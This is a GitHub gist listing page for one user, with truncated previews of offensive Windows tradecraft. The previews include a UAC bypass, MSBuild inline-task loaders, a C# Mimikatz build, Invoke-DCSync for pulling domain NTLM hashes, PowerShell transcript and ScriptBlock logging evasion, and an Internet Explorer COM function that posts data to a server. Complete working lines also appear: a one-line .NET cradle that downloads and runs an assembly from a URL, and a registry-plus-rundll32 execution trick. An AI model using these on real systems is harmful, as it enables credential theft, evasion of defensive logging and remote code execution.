Skip to content

Instantly share code, notes, and snippets.

Moriarty2016 / clr_via_native.c
Created Feb 24, 2020 — forked from xpn/clr_via_native.c
A quick example showing loading CLR via native code
View clr_via_native.c
#include "stdafx.h"
int main()
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
Moriarty2016 / cmlua.cs
Created Oct 24, 2019
Bypass UAC with ICMLuaUtil --- .Net Version
View cmlua.cs
using System;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.Runtime.CompilerServices;
namespace Test1
public static class Test
internal enum HRESULT : long
View msbuild demo.xml
<Project ToolsVersion="4.0" xmlns="">
<Target Name="DemoClass">
<ClassExample />
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Code Type="Class" Language="cs">
Moriarty2016 / katz.cs
Created Aug 1, 2018
Updated Katz.cs - Latest Mimikatz, I mean honestly it is 2018...
View katz.cs
This file has been truncated, but you can view the full file.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
Moriarty2016 / ie_com.cs
Created Jul 31, 2018 — forked from leoloobeek/ie_com.cs
InternetExplorer.Application PoC's
View ie_com.cs
// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
object IE = Activator.CreateInstance(com_type);
object[] falseArr = new object[] { false };
object[] trueArr = new object[] { true };
com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);
Moriarty2016 / posh.cs
Created Jul 19, 2018 — forked from benpturner/posh.cs
No Powershell with Transcript Logging Evasion & ScriptBlock Logging Evasion - eventid 4103,4104,4106
View posh.cs
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Security;
using System.Management.Automation.Runspaces;
using System.Reflection;
namespace TranscriptBypass
// Compiling with CSC.exe v4.0.30319 or v3.5
Moriarty2016 / Invoke-DCSync.ps1
Created Jul 5, 2018 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
View Invoke-DCSync.ps1
This file has been truncated, but you can view the full file.
function Invoke-DCSync
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y
View DotnetAssemblyDownloadCradle.cs
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
View trick.txt
1. powershell -ep -C [guid]::NewGuid().Guid
Use this command to generate a new {GUID}
2.reg add HKCU\Software\Classes\CLSID\{GUID}\Shell\Manage\command /ve /t REG_SZ /d "calc.exe"
Simply add a reg entry.
3.rundll32 url.dll, OpenURL shell:::{GUID}
Magic reveals:-)
Moriarty2016 / JankyAF.csproj
Created May 28, 2018 — forked from bohops/JankyAF.csproj
Fun loader for Casey Smith's (@subTee) JanyAF.xsl
View JankyAF.csproj
<Project ToolsVersion="4.0" xmlns="">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
<Target Name="Hello">
<ClassExample />
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
You can’t perform that action at this time.